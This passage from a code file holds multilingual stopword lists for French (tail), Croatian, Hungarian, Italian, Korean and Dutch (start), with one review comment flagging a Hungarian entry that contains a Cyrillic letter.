"telle",
"tellement",
"telles",
"tels",
"tenant",
"tend",
"tenir",
"tente",
"tes",
"tic",
"tien",
"tienne",
"tiennes",
"tiens",
"toc",
"toi",
"toi-même",
"ton",
"touchant",
"toujours",
"tous",
"tout",
"toute",
"toutefois",
"toutes",
"treize",
"trente",
"tres",
"trois",
"troisième",
"troisièmement",
"trop",
"très",
"tsoin",
"tsouin",
"tu",
"té",
"u",
"un",
"une",
"unes",
"uniformement",
"unique",
"uniques",
"uns",
"v",
"va",
"vais",
"vas",
"vers",
"via",
"vif",
"vifs",
"vingt",
"vivat",
"vive",
"vives",
"vlan",
"voici",
"voilà",
"vont",
"vos",
"votre",
"vous",
"vous-mêmes",
"vu",
"vé",
"vôtre",
"vôtres",
"w",
"x",
"y",
"z",
"zut",
"à",
"â",
"ça",
"ès",
"étaient",
"étais",
"était",
"étant",
"été",
"être",
"ô",
],
"hr": [
"a",
"ako",
"ali",
"bi",
"bih",
"bila",
"bili",
"bilo",
"bio",
"bismo",
"biste",
"biti",
"bumo",
"da",
"do",
"duž",
"ga",
"hoće",
"hoćemo",
"hoćete",
"hoćeš",
"hoću",
"i",
"iako",
"ih",
"ili",
"iz",
"ja",
"je",
"jedna",
"jedne",
"jedno",
"jer",
"jesam",
"jesi",
"jesmo",
"jest",
"jeste",
"jesu",
"jim",
"joj",
"još",
"ju",
"kada",
"kako",
"kao",
"koja",
"koje",
"koji",
"kojima",
"koju",
"kroz",
"li",
"me",
"mene",
"meni",
"mi",
"mimo",
"moj",
"moja",
"moje",
"mu",
"na",
"nad",
"nakon",
"nam",
"nama",
"nas",
"naš",
"naša",
"naše",
"našeg",
"ne",
"nego",
"neka",
"neki",
"nekog",
"neku",
"nema",
"netko",
"neće",
"nećemo",
"nećete",
"nećeš",
"neću",
"nešto",
"ni",
"nije",
"nikoga",
"nikoje",
"nikoju",
"nisam",
"nisi",
"nismo",
"niste",
"nisu",
"njega",
"njegov",
"njegova",
"njegovo",
"njemu",
"njezin",
"njezina",
"njezino",
"njih",
"njihov",
"njihova",
"njihovo",
"njim",
"njima",
"njoj",
"nju",
"no",
"o",
"od",
"odmah",
"on",
"ona",
"oni",
"ono",
"ova",
"pa",
"pak",
"po",
"pod",
"pored",
"prije",
"s",
"sa",
"sam",
"samo",
"se",
"sebe",
"sebi",
"si",
"smo",
"ste",
"su",
"sve",
"svi",
"svog",
"svoj",
"svoja",
"svoje",
"svom",
"ta",
"tada",
"taj",
"tako",
"te",
"tebe",
"tebi",
"ti",
"to",
"toj",
"tome",
"tu",
"tvoj",
"tvoja",
"tvoje",
"u",
"uz",
"vam",
"vama",
"vas",
"vaš",
"vaša",
"vaše",
"već",
"vi",
"vrlo",
"za",
"zar",
"će",
"ćemo",
"ćete",
"ćeš",
"ću",
"što",
],
"hu": [
"a",
"abba",
"abban",
"abból",
"addig",
"ahhoz",
"ahogy",
"ahol",
"aki",
"akik",
"akkor",
"akár",
"alapján",
"alatt",
"alatta",
"alattad",
"alattam",
"alattatok",
"alattuk",
"alattunk",
"alá",
"alád",
"alájuk",
"alám",
"alánk",
"alátok",
"alól",
"alóla",
"alólad",
"alólam",
"alólatok",
"alóluk",
"alólunk",
"amely",
"amelybol",
"amelyek",
"amelyekben",
"amelyeket",
"amelyet",
"amelyik",
"amelynek",
"ami",
"amikor",
"amit",
"amolyan",
"amott",
"amíg",
"annak",
"annál",
"arra",
"arról",
"attól",
"az",
"aznap",
"azok",
"azokat",
"azokba",
"azokban",
"azokból",
"azokhoz",
"azokig",
"azokkal",
"azokká",
"azoknak",
"azoknál",
"azokon",
"azokra",
"azokról",
"azoktól",
"azokért",
"azon",
"azonban",
"azonnal",
"azt",
"aztán",
"azután",
"azzal",
"azzá",
"azért",
"bal",
"balra",
"ban",
"be",
"belé",
"beléd",
"beléjük",
"belém",
"belénk",
"belétek",
"belül",
"belőle",
"belőled",
"belőlem",
"belőletek",
"belőlük",
"belőlünk",
"ben",
"benne",
"benned",
"bennem",
"bennetek",
"bennük",
"bennünk",
"bár",
"bárcsak",
"bármilyen",
"búcsú",
"cikk",
"cikkek",
"cikkeket",
"csak",
"csakhogy",
"csupán",
"de",
"dehogy",
"e",
"ebbe",
"ebben",
"ebből",
"eddig",
"egy",
"egyebek",
"egyebet",
"egyedül",
"egyelőre",
"egyes",
"egyet",
"egyetlen",
"egyik",
"egymás",
"egyre",
"egyszerre",
"egyéb",
"együtt",
"egész",
"egészen",
"ehhez",
"ekkor",
"el",
"eleinte",
"ellen",
"ellenes",
"elleni",
"ellenére",
"elmondta",
"első",
"elsők",
"elsősorban",
"elsőt",
"elé",
"eléd",
"elég",
"eléjük",
"elém",
"elénk",
"elétek",
"elő",
"előbb",
"elől",
"előle",
"előled",
"előlem",
"előletek",
"előlük",
"előlünk",
"először",
"előtt",
"előtte",
"előtted",
"előttem",
"előttetek",
"előttük",
"előttünk",
"előző",
"emilyen",
"engem",
"ennek",
"ennyi",
"ennél",
"enyém",
"erre",
"erről",
"esetben",
"ettől",
"ez",
"ezek",
"ezekbe",
"ezekben",
"ezekből",
"ezeken",
"ezeket",
"ezekhez",
"ezekig",
"ezekkel",
"ezekké",
"ezeknek",
"ezeknél",
"ezekre",
"ezekről",
"ezektől",
"ezekért",
"ezen",
"ezentúl",
"ezer",
"ezret",
"ezt",
"ezután",
"ezzel",
"ezzé",
"ezért",
"fel",
"fele",
"felek",
"felet",
"felett",
"felé",
"fent",
"fenti",
"fél",
"fölé",
"gyakran",
"ha",
"halló",
"hamar",
"hanem",
"harmadik",
"harmadikat",
"harminc",
"hat",
"hatodik",
"hatodikat",
"hatot",
"hatvan",
"helyett",
"hetedik",
"hetediket",
"hetet",
"hetven",
"hirtelen",
"hiszen",
"hiába",
"hogy",
"hogyan",
"hol",
"holnap",
"holnapot",
"honnan",
"hova",
"hozzá",
"hozzád",
"hozzájuk",
"hozzám",
"hozzánk",
"hozzátok",
"hurrá",
"huszadik",
"hány",
"hányszor",
"hármat",
"három",
"hát",
"hátha",
"hátulsó",
"hét",
"húsz",
"ide",
"ide-oda",  # correct Latin-script Hungarian form ("back and forth")
"ide-оda",  # NOTE(review): original upstream entry kept for backward compatibility — its second 'о' is Cyrillic U+043E, so it never matches Latin-script text
"idén",
"igazán",
"igen",
"ill",
"illetve",
"ilyen",
"ilyenkor",
"immár",
"inkább",
"is",
"ismét",
"ison",
"itt",
"jelenleg",
"jobban",
"jobbra",
"jó",
"jól",
"jólesik",
"jóval",
"jövőre",
"kell",
"kellene",
"kellett",
"kelljen",
"keressünk",
"keresztül",
"ketten",
"kettő",
"kettőt",
"kevés",
"ki",
"kiben",
"kiből",
"kicsit",
"kicsoda",
"kihez",
"kik",
"kikbe",
"kikben",
"kikből",
"kiken",
"kiket",
"kikhez",
"kikkel",
"kikké",
"kiknek",
"kiknél",
"kikre",
"kikről",
"kiktől",
"kikért",
"kilenc",
"kilencedik",
"kilencediket",
"kilencet",
"kilencven",
"kin",
"kinek",
"kinél",
"kire",
"kiről",
"kit",
"kitől",
"kivel",
"kivé",
"kié",
"kiért",
"korábban",
"képest",
"kérem",
"kérlek",
"kész",
"késő",
"később",
"későn",
"két",
"kétszer",
"kívül",
"körül",
"köszönhetően",
"köszönöm",
"közben",
"közel",
"közepesen",
"közepén",
"közé",
"között",
"közül",
"külön",
"különben",
"különböző",
"különbözőbb",
"különbözőek",
"lassan",
"le",
"legalább",
"legyen",
"lehet",
"lehetetlen",
"lehetett",
"lehetőleg",
"lehetőség",
"lenne",
"lenni",
"lennék",
"lennének",
"lesz",
"leszek",
"lesznek",
"leszünk",
"lett",
"lettek",
"lettem",
"lettünk",
"lévő",
"ma",
"maga",
"magad",
"magam",
"magatokat",
"magukat",
"magunkat",
"magát",
"mai",
"majd",
"majdnem",
"manapság",
"meg",
"megcsinál",
"megcsinálnak",
"megint",
"megvan",
"mellett",
"mellette",
"melletted",
"mellettem",
"mellettetek",
"mellettük",
"mellettünk",
"mellé",
"melléd",
"melléjük",
"mellém",
"mellénk",
"mellétek",
"mellől",
"mellőle",
"mellőled",
"mellőlem",
"mellőletek",
"mellőlük",
"mellőlünk",
"mely",
"melyek",
"melyik",
"mennyi",
"mert",
"mi",
"miatt",
"miatta",
"miattad",
"miattam",
"miattatok",
"miattuk",
"miattunk",
"mibe",
"miben",
"miből",
"mihez",
"mik",
"mikbe",
"mikben",
"mikből",
"miken",
"miket",
"mikhez",
"mikkel",
"mikké",
"miknek",
"miknél",
"mikor",
"mikre",
"mikről",
"miktől",
"mikért",
"milyen",
"min",
"mind",
"mindegyik",
"mindegyiket",
"minden",
"mindenesetre",
"mindenki",
"mindent",
"mindenütt",
"mindig",
"mindketten",
"minek",
"minket",
"mint",
"mintha",
"minél",
"mire",
"miről",
"mit",
"mitől",
"mivel",
"mivé",
"miért",
"mondta",
"most",
"mostanáig",
"már",
"más",
"másik",
"másikat",
"másnap",
"második",
"másodszor",
"mások",
"másokat",
"mást",
"még",
"mégis",
"míg",
"mögé",
"mögéd",
"mögéjük",
"mögém",
"mögénk",
"mögétek",
"mögött",
"mögötte",
"mögötted",
"mögöttem",
"mögöttetek",
"mögöttük",
"mögöttünk",
"mögül",
"mögüle",
"mögüled",
"mögülem",
"mögületek",
"mögülük",
"mögülünk",
"múltkor",
"múlva",
"na",
"nagy",
"nagyobb",
"nagyon",
"naponta",
"napot",
"ne",
"negyedik",
"negyediket",
"negyven",
"neked",
"nekem",
"neki",
"nekik",
"nektek",
"nekünk",
"nem",
"nemcsak",
"nemrég",
"nincs",
"nyolc",
"nyolcadik",
"nyolcadikat",
"nyolcat",
"nyolcvan",
"nála",
"nálad",
"nálam",
"nálatok",
"náluk",
"nálunk",
"négy",
"négyet",
"néha",
"néhány",
"nélkül",
"o",
"oda",
"ok",
"olyan",
"onnan",
"ott",
"pedig",
"persze",
"pár",
"például",
"rajta",
"rajtad",
"rajtam",
"rajtatok",
"rajtuk",
"rajtunk",
"rendben",
"rosszul",
"rá",
"rád",
"rájuk",
"rám",
"ránk",
"rátok",
"régen",
"régóta",
"részére",
"róla",
"rólad",
"rólam",
"rólatok",
"róluk",
"rólunk",
"rögtön",
"s",
"saját",
"se",
"sem",
"semmi",
"semmilyen",
"semmiség",
"senki",
"soha",
"sok",
"sokan",
"sokat",
"sokkal",
"sokszor",
"sokáig",
"során",
"stb.",
"szemben",
"szerbusz",
"szerint",
"szerinte",
"szerinted",
"szerintem",
"szerintetek",
"szerintük",
"szerintünk",
"szervusz",
"szinte",
"számára",
"száz",
"századik",
"százat",
"szépen",
"szét",
"szíves",
"szívesen",
"szíveskedjék",
"sőt",
"talán",
"tavaly",
"te",
"tegnap",
"tegnapelőtt",
"tehát",
"tele",
"teljes",
"tessék",
"ti",
"tied",
"titeket",
"tizedik",
"tizediket",
"tizenegy",
"tizenegyedik",
"tizenhat",
"tizenhárom",
"tizenhét",
"tizenkettedik",
"tizenkettő",
"tizenkilenc",
"tizenkét",
"tizennyolc",
"tizennégy",
"tizenöt",
"tizet",
"tovább",
"további",
"továbbá",
"távol",
"téged",
"tényleg",
"tíz",
"több",
"többi",
"többször",
"túl",
"tőle",
"tőled",
"tőlem",
"tőletek",
"tőlük",
"tőlünk",
"ugyanakkor",
"ugyanez",
"ugyanis",
"ugye",
"urak",
"uram",
"urat",
"utoljára",
"utolsó",
"után",
"utána",
"vagy",
"vagyis",
"vagyok",
"vagytok",
"vagyunk",
"vajon",
"valahol",
"valaki",
"valakit",
"valamelyik",
"valami",
"valamint",
"való",
"van",
"vannak",
"vele",
"veled",
"velem",
"veletek",
"velük",
"velünk",
"vissza",
"viszlát",
"viszont",
"viszontlátásra",
"volna",
"volnának",
"volnék",
"volt",
"voltak",
"voltam",
"voltunk",
"végre",
"végén",
"végül",
"által",
"általában",
"ám",
"át",
"éljen",
"én",
"éppen",
"érte",
"érted",
"értem",
"értetek",
"értük",
"értünk",
"és",
"év",
"évben",
"éve",
"évek",
"éves",
"évi",
"évvel",
"így",
"óta",
"ön",
"önbe",
"önben",
"önből",
"önhöz",
"önnek",
"önnel",
"önnél",
"önre",
"önről",
"önt",
"öntől",
"önért",
"önök",
"önökbe",
"önökben",
"önökből",
"önöket",
"önökhöz",
"önökkel",
"önöknek",
"önöknél",
"önökre",
"önökről",
"önöktől",
"önökért",
"önökön",
"önön",
"össze",
"öt",
"ötven",
"ötödik",
"ötödiket",
"ötöt",
"úgy",
"úgyis",
"úgynevezett",
"új",
"újabb",
"újra",
"úr",
"ő",
"ők",
"őket",
"őt",
],
"it": [
"IE",
"a",
"abbastanza",
"abbia",
"abbiamo",
"abbiano",
"abbiate",
"accidenti",
"ad",
"adesso",
"affinche",
"agl",
"agli",
"ahime",
"ahimè",
"ai",
"al",
"alcuna",
"alcuni",
"alcuno",
"all",
"alla",
"alle",
"allo",
"allora",
"altri",
"altrimenti",
"altro",
"altrove",
"altrui",
"anche",
"ancora",
"anni",
"anno",
"ansa",
"anticipo",
"assai",
"attesa",
"attraverso",
"avanti",
"avemmo",
"avendo",
"avente",
"aver",
"avere",
"averlo",
"avesse",
"avessero",
"avessi",
"avessimo",
"aveste",
"avesti",
"avete",
"aveva",
"avevamo",
"avevano",
"avevate",
"avevi",
"avevo",
"avrai",
"avranno",
"avrebbe",
"avrebbero",
"avrei",
"avremmo",
"avremo",
"avreste",
"avresti",
"avrete",
"avrà",
"avrò",
"avuta",
"avute",
"avuti",
"avuto",
"basta",
"bene",
"benissimo",
"berlusconi",
"brava",
"bravo",
"c",
"casa",
"caso",
"cento",
"certa",
"certe",
"certi",
"certo",
"che",
"chi",
"chicchessia",
"chiunque",
"ci",
"ciascuna",
"ciascuno",
"cima",
"cio",
"cioe",
"cioè",
"circa",
"citta",
"città",
"ciò",
"co",
"codesta",
"codesti",
"codesto",
"cogli",
"coi",
"col",
"colei",
"coll",
"coloro",
"colui",
"come",
"cominci",
"comunque",
"con",
"concernente",
"conciliarsi",
"conclusione",
"consiglio",
"contro",
"cortesia",
"cos",
"cosa",
"cosi",
"così",
"cui",
"d",
"da",
"dagl",
"dagli",
"dai",
"dal",
"dall",
"dalla",
"dalle",
"dallo",
"dappertutto",
"davanti",
"degl",
"degli",
"dei",
"del",
"dell",
"della",
"delle",
"dello",
"dentro",
"detto",
"deve",
"di",
"dice",
"dietro",
"dire",
"dirimpetto",
"diventa",
"diventare",
"diventato",
"dopo",
"dov",
"dove",
"dovra",
"dovrà",
"dovunque",
"due",
"dunque",
"durante",
"e",
"ebbe",
"ebbero",
"ebbi",
"ecc",
"ecco",
"ed",
"effettivamente",
"egli",
"ella",
"entrambi",
"eppure",
"era",
"erano",
"eravamo",
"eravate",
"eri",
"ero",
"esempio",
"esse",
"essendo",
"esser",
"essere",
"essi",
"ex",
"fa",
"faccia",
"facciamo",
"facciano",
"facciate",
"faccio",
"facemmo",
"facendo",
"facesse",
"facessero",
"facessi",
"facessimo",
"faceste",
"facesti",
"faceva",
"facevamo",
"facevano",
"facevate",
"facevi",
"facevo",
"fai",
"fanno",
"farai",
"faranno",
"fare",
"farebbe",
"farebbero",
"farei",
"faremmo",
"faremo",
"fareste",
"faresti",
"farete",
"farà",
"farò",
"fatto",
"favore",
"fece",
"fecero",
"feci",
"fin",
"finalmente",
"finche",
"fine",
"fino",
"forse",
"forza",
"fosse",
"fossero",
"fossi",
"fossimo",
"foste",
"fosti",
"fra",
"frattempo",
"fu",
"fui",
"fummo",
"fuori",
"furono",
"futuro",
"generale",
"gia",
"giacche",
"giorni",
"giorno",
"già",
"gli",
"gliela",
"gliele",
"glieli",
"glielo",
"gliene",
"governo",
"grande",
"grazie",
"gruppo",
"ha",
"haha",
"hai",
"hanno",
"ho",
"i",
"ieri",
"il",
"improvviso",
"in",
"inc",
"infatti",
"inoltre",
"insieme",
"intanto",
"intorno",
"invece",
"io",
"l",
"la",
"lasciato",
"lato",
"lavoro",
"le",
"lei",
"li",
"lo",
"lontano",
"loro",
"lui",
"lungo",
"luogo",
"là",
"ma",
"macche",
"magari",
"maggior",
"mai",
"male",
"malgrado",
"malissimo",
"mancanza",
"marche",
"me",
"medesimo",
"mediante",
"meglio",
"meno",
"mentre",
"mesi",
"mezzo",
"mi",
"mia",
"mie",
"miei",
"mila",
"miliardi",
"milioni",
"minimi",
"ministro",
"mio",
"modo",
"molti",
"moltissimo",
"molto",
"momento",
"mondo",
"mosto",
"nazionale",
"ne",
"negl",
"negli",
"nei",
"nel",
"nell",
"nella",
"nelle",
"nello",
"nemmeno",
"neppure",
"nessun",
"nessuna",
"nessuno",
"niente",
"no",
"noi",
"non",
"nondimeno",
"nonostante",
"nonsia",
"nostra",
"nostre",
"nostri",
"nostro",
"novanta",
"nove",
"nulla",
"nuovo",
"o",
"od",
"oggi",
"ogni",
"ognuna",
"ognuno",
"oltre",
"oppure",
"ora",
"ore",
"osi",
"ossia",
"ottanta",
"otto",
"paese",
"parecchi",
"parecchie",
"parecchio",
"parte",
"partendo",
"peccato",
"peggio",
"per",
"perche",
"perchè",
"perché",
"percio",
"perciò",
"perfino",
"pero",
"persino",
"persone",
"però",
"piedi",
"pieno",
"piglia",
"piu",
"piuttosto",
"più",
"po",
"pochissimo",
"poco",
"poi",
"poiche",
"possa",
"possedere",
"posteriore",
"posto",
"potrebbe",
"preferibilmente",
"presa",
"press",
"prima",
"primo",
"principalmente",
"probabilmente",
"proprio",
"puo",
"pure",
"purtroppo",
"può",
"qualche",
"qualcosa",
"qualcuna",
"qualcuno",
"quale",
"quali",
"qualunque",
"quando",
"quanta",
"quante",
"quanti",
"quanto",
"quantunque",
"quasi",
"quattro",
"quel",
"quella",
"quelle",
"quelli",
"quello",
"quest",
"questa",
"queste",
"questi",
"questo",
"qui",
"quindi",
"realmente",
"recente",
"recentemente",
"registrazione",
"relativo",
"riecco",
"salvo",
"sara",
"sarai",
"saranno",
"sarebbe",
"sarebbero",
"sarei",
"saremmo",
"saremo",
"sareste",
"saresti",
"sarete",
"sarà",
"sarò",
"scola",
"scopo",
"scorso",
"se",
"secondo",
"seguente",
"seguito",
"sei",
"sembra",
"sembrare",
"sembrato",
"sembri",
"sempre",
"senza",
"sette",
"si",
"sia",
"siamo",
"siano",
"siate",
"siete",
"sig",
"solito",
"solo",
"soltanto",
"sono",
"sopra",
"sotto",
"spesso",
"srl",
"sta",
"stai",
"stando",
"stanno",
"starai",
"staranno",
"starebbe",
"starebbero",
"starei",
"staremmo",
"staremo",
"stareste",
"staresti",
"starete",
"starà",
"starò",
"stata",
"state",
"stati",
"stato",
"stava",
"stavamo",
"stavano",
"stavate",
"stavi",
"stavo",
"stemmo",
"stessa",
"stesse",
"stessero",
"stessi",
"stessimo",
"stesso",
"steste",
"stesti",
"stette",
"stettero",
"stetti",
"stia",
"stiamo",
"stiano",
"stiate",
"sto",
"su",
"sua",
"subito",
"successivamente",
"successivo",
"sue",
"sugl",
"sugli",
"sui",
"sul",
"sull",
"sulla",
"sulle",
"sullo",
"suo",
"suoi",
"tale",
"tali",
"talvolta",
"tanto",
"te",
"tempo",
"ti",
"titolo",
"torino",
"tra",
"tranne",
"tre",
"trenta",
"troppo",
"trovato",
"tu",
"tua",
"tue",
"tuo",
"tuoi",
"tutta",
"tuttavia",
"tutte",
"tutti",
"tutto",
"uguali",
"ulteriore",
"ultimo",
"un",
"una",
"uno",
"uomo",
"va",
"vale",
"vari",
"varia",
"varie",
"vario",
"verso",
"vi",
"via",
"vicino",
"visto",
"vita",
"voi",
"volta",
"volte",
"vostra",
"vostre",
"vostri",
"vostro",
"è",
],
"ko": [
"!",
'"',
"$",
"%",
"&",
"'",
"(",
")",
"*",
"+",
",",
"-",
".",
"...",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
";",
"<",
"=",
">",
"?",
"@",
"\\",
"^",
"_",
"`",
"|",
"~",
"·",
"—",
"——",
"‘",
"’",
"“",
"”",
"…",
"、",
"。",
"〈",
"〉",
"《",
"》",
"가",
"가까스로",
"가령",
"각",
"각각",
"각자",
"각종",
"갖고말하자면",
"같다",
"같이",
"개의치않고",
"거니와",
"거바",
"거의",
"것",
"것과 같이",
"것들",
"게다가",
"게우다",
"겨우",
"견지에서",
"결과에 이르다",
"결국",
"결론을 낼 수 있다",
"겸사겸사",
"고려하면",
"고로",
"곧",
"공동으로",
"과",
"과연",
"관계가 있다",
"관계없이",
"관련이 있다",
"관하여",
"관한",
"관해서는",
"구",
"구체적으로",
"구토하다",
"그",
"그들",
"그때",
"그래",
"그래도",
"그래서",
"그러나",
"그러니",
"그러니까",
"그러면",
"그러므로",
"그러한즉",
"그런 까닭에",
"그런데",
"그런즉",
"그럼",
"그럼에도 불구하고",
"그렇게 함으로써",
"그렇지",
"그렇지 않다면",
"그렇지 않으면",
"그렇지만",
"그렇지않으면",
"그리고",
"그리하여",
"그만이다",
"그에 따르는",
"그위에",
"그저",
"그중에서",
"그치지 않다",
"근거로",
"근거하여",
"기대여",
"기점으로",
"기준으로",
"기타",
"까닭으로",
"까악",
"까지",
"까지 미치다",
"까지도",
"꽈당",
"끙끙",
"끼익",
"나",
"나머지는",
"남들",
"남짓",
"너",
"너희",
"너희들",
"네",
"넷",
"년",
"논하지 않다",
"놀라다",
"누가 알겠는가",
"누구",
"다른",
"다른 방면으로",
"다만",
"다섯",
"다소",
"다수",
"다시 말하자면",
"다시말하면",
"다음",
"다음에",
"다음으로",
"단지",
"답다",
"당신",
"당장",
"대로 하다",
"대하면",
"대하여",
"대해 말하자면",
"대해서",
"댕그",
"더구나",
"더군다나",
"더라도",
"더불어",
"더욱더",
"더욱이는",
"도달하다",
"도착하다",
"동시에",
"동안",
"된바에야",
"된이상",
"두번째로",
"둘",
"둥둥",
"뒤따라",
"뒤이어",
"든간에",
"들",
"등",
"등등",
"딩동",
"따라",
"따라서",
"따위",
"따지지 않다",
"딱",
"때",
"때가 되어",
"때문에",
"또",
"또한",
"뚝뚝",
"라 해도",
"령",
"로",
"로 인하여",
"로부터",
"로써",
"륙",
"를",
"마음대로",
"마저",
"마저도",
"마치",
"막론하고",
"만 못하다",
"만약",
"만약에",
"만은 아니다",
"만이 아니다",
"만일",
"만큼",
"말하자면",
"말할것도 없고",
"매",
"매번",
"메쓰겁다",
"몇",
"모",
"모두",
"무렵",
"무릎쓰고",
"무슨",
"무엇",
"무엇때문에",
"물론",
"및",
"바꾸어말하면",
"바꾸어말하자면",
"바꾸어서 말하면",
"바꾸어서 한다면",
"바꿔 말하면",
"바로",
"바와같이",
"밖에 안된다",
"반대로",
"반대로 말하자면",
"반드시",
"버금",
"보는데서",
"보다더",
"보드득",
"본대로",
"봐",
"봐라",
"부류의 사람들",
"부터",
"불구하고",
"불문하고",
"붕붕",
"비걱거리다",
"비교적",
"비길수 없다",
"비로소",
"비록",
"비슷하다",
"비추어 보아",
"비하면",
"뿐만 아니라",
"뿐만아니라",
"뿐이다",
"삐걱",
"삐걱거리다",
"사",
"삼",
"상대적으로 말하자면",
"생각한대로",
"설령",
"설마",
"설사",
"셋",
"소생",
"소인",
"솨",
"쉿",
"습니까",
"습니다",
"시각",
"시간",
"시작하여",
"시초에",
"시키다",
"실로",
"심지어",
"아",
"아니",
"아니나다를가",
"아니라면",
"아니면",
"아니었다면",
"아래윗",
"아무거나",
"아무도",
"아야",
"아울러",
"아이",
"아이고",
"아이구",
"아이야",
"아이쿠",
"아하",
"아홉",
"안 그러면",
"않기 위하여",
"않기 위해서",
"알 수 있다",
"알았어",
"앗",
"앞에서",
"앞의것",
"야",
"약간",
"양자",
"어",
"어기여차",
"어느",
"어느 년도",
"어느것",
"어느곳",
"어느때",
"어느쪽",
"어느해",
"어디",
"어때",
"어떠한",
"어떤",
"어떤것",
"어떤것들",
"어떻게",
"어떻해",
"어이",
"어째서",
"어쨋든",
"어쩔수 없다",
"어찌",
"어찌됏든",
"어찌됏어",
"어찌하든지",
"어찌하여",
"언제",
"언젠가",
"얼마",
"얼마 안 되는 것",
"얼마간",
"얼마나",
"얼마든지",
"얼마만큼",
"얼마큼",
"엉엉",
"에",
"에 가서",
"에 달려 있다",
"에 대해",
"에 있다",
"에 한하다",
"에게",
"에서",
"여",
"여기",
"여덟",
"여러분",
"여보시오",
"여부",
"여섯",
"여전히",
"여차",
"연관되다",
"연이서",
"영",
"영차",
"옆사람",
"예",
"예를 들면",
"예를 들자면",
"예컨대",
"예하면",
"오",
"오로지",
"오르다",
"오자마자",
"오직",
"오호",
"오히려",
"와",
"와 같은 사람들",
"와르르",
"와아",
"왜",
"왜냐하면",
"외에도",
"요만큼",
"요만한 것",
"요만한걸",
"요컨대",
"우르르",
"우리",
"우리들",
"우선",
"우에 종합한것과같이",
"운운",
"월",
"위에서 서술한바와같이",
"위하여",
"위해서",
"윙윙",
"육",
"으로",
"으로 인하여",
"으로서",
"으로써",
"을",
"응",
"응당",
"의",
"의거하여",
"의지하여",
"의해",
"의해되다",
"의해서",
"이",
"이 되다",
"이 때문에",
"이 밖에",
"이 외에",
"이 정도의",
"이것",
"이곳",
"이때",
"이라면",
"이래",
"이러이러하다",
"이러한",
"이런",
"이럴정도로",
"이렇게 많은 것",
"이렇게되면",
"이렇게말하자면",
"이렇구나",
"이로 인하여",
"이르기까지",
"이리하여",
"이만큼",
"이번",
"이봐",
"이상",
"이어서",
"이었다",
"이와 같다",
"이와 같은",
"이와 반대로",
"이와같다면",
"이외에도",
"이용하여",
"이유만으로",
"이젠",
"이지만",
"이쪽",
"이천구",
"이천육",
"이천칠",
"이천팔",
"인 듯하다",
"인젠",
"일",
"일것이다",
"일곱",
"일단",
"일때",
"일반적으로",
"일지라도",
"임에 틀림없다",
"입각하여",
"입장에서",
"잇따라",
"있다",
"자",
"자기",
"자기집",
"자마자",
"자신",
"잠깐",
"잠시",
"저",
"저것",
"저것만큼",
"저기",
"저쪽",
"저희",
"전부",
"전자",
"전후",
"점에서 보아",
"정도에 이르다",
"제",
"제각기",
"제외하고",
"조금",
"조차",
"조차도",
"졸졸",
"좀",
"좋아",
"좍좍",
"주룩주룩",
"주저하지 않고",
"줄은 몰랏다",
"줄은모른다",
"중에서",
"중의하나",
"즈음하여",
"즉",
"즉시",
"지든지",
"지만",
"지말고",
"진짜로",
"쪽으로",
"차라리",
"참",
"참나",
"첫번째로",
"쳇",
"총적으로",
"총적으로 말하면",
"총적으로 보면",
"칠",
"콸콸",
"쾅쾅",
"쿵",
"타다",
"타인",
"탕탕",
"토하다",
"통하여",
"툭",
"퉤",
"틈타",
"팍",
"팔",
"퍽",
"펄렁",
"하",
"하게될것이다",
"하게하다",
"하겠는가",
"하고 있다",
"하고있었다",
"하곤하였다",
"하구나",
"하기 때문에",
"하기 위하여",
"하기는한데",
"하기만 하면",
"하기보다는",
"하기에",
"하나",
"하느니",
"하는 김에",
"하는 편이 낫다",
"하는것도",
"하는것만 못하다",
"하는것이 낫다",
"하는바",
"하더라도",
"하도다",
"하도록시키다",
"하도록하다",
"하든지",
"하려고하다",
"하마터면",
"하면 할수록",
"하면된다",
"하면서",
"하물며",
"하여금",
"하여야",
"하자마자",
"하지 않는다면",
"하지 않도록",
"하지마",
"하지마라",
"하지만",
"하하",
"한 까닭에",
"한 이유는",
"한 후",
"한다면",
"한다면 몰라도",
"한데",
"한마디",
"한적이있다",
"한켠으로는",
"한항목",
"할 따름이다",
"할 생각이다",
"할 줄 안다",
"할 지경이다",
"할 힘이 있다",
"할때",
"할만하다",
"할망정",
"할뿐",
"할수있다",
"할수있어",
"할줄알다",
"할지라도",
"할지언정",
"함께",
"해도된다",
"해도좋다",
"해봐요",
"해서는 안된다",
"해야한다",
"해요",
"했어요",
"향하다",
"향하여",
"향해서",
"허",
"허걱",
"허허",
"헉",
"헉헉",
"헐떡헐떡",
"형식으로 쓰여",
"혹시",
"혹은",
"혼자",
"훨씬",
"휘익",
"휴",
"흐흐",
"흥",
"힘입어",
"︿",
"!",
"#",
"$",
"%",
"&",
"(",
")",
"*",
"+",
",",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
":",
";",
"<",
">",
"?",
"@",
"[",
"]",
"{",
"|",
"}",
"~",
"¥",
],
"nl": [
"aan",
"achte",
"achter",
"af",
"al",
"alle",
"alleen",
"alles",
"als",
"ander",
"anders",
"beetje",
"behalve",
"beide",
"beiden",
"ben",
"beneden",
"bent",
"bij",
"bijna",
"bijv",
"blijkbaar",
"blijken",
"boven",
"bv",
"daar",
"daardoor",
"daarin",
"daarna",
"daarom",
"daaruit",
"dan",
"dat",
"de",
"deden",
"deed",
"derde",
"derhalve",
"dertig",
"deze",
"dhr",
"die",
"dit",
"doe",
"doen",
"doet",
"door",
"drie",
"duizend",
"echter",
"een",
"eens",
"eerst",
"eerste",
"eigen",
"eigenlijk",
"elk",
"elke",
"en",
"enige",
"er",
"erg",
"ergens",
"etc",
"etcetera",
"even",
"geen",
"genoeg",
"geweest",
"haar",
"haarzelf",
"had",
"hadden",
"heb",
"hebben",
"hebt",
"hedden",
"heeft",
"heel",
"hem",
"hemzelf",
"hen",
"het",
"hetzelfde",
"hier",
"hierin",
"hierna",
"hierom",
"hij",
"hijzelf",
"hoe",
"honderd",
"hun",
"ieder",
"iedere",
"iedereen",
"iemand",
"iets",
"ik",
"in",
"inderdaad",
"intussen",
"is",
"ja",
"je",
"jij",
"jijzelf",
"jou",
"jouw",
"jullie",
"kan",
"kon",
"konden",
"kun",
"kunnen",
"kunt",
"laatst",
"later",
"lijken",
"lijkt",
"maak",
"maakt",
"maakte",
"maakten",
"maar",
"mag",
"maken",
"me",
"meer",
"meest",
"meestal",
"men",
"met",
"mevr",
"mij",
"mijn",
"minder",
"miss",
"misschien",
"missen",
"mits",
"mocht",
"mochten",
"moest",
"moesten",
"moet",
"moeten",
"mogen",
"mr",
"mrs",
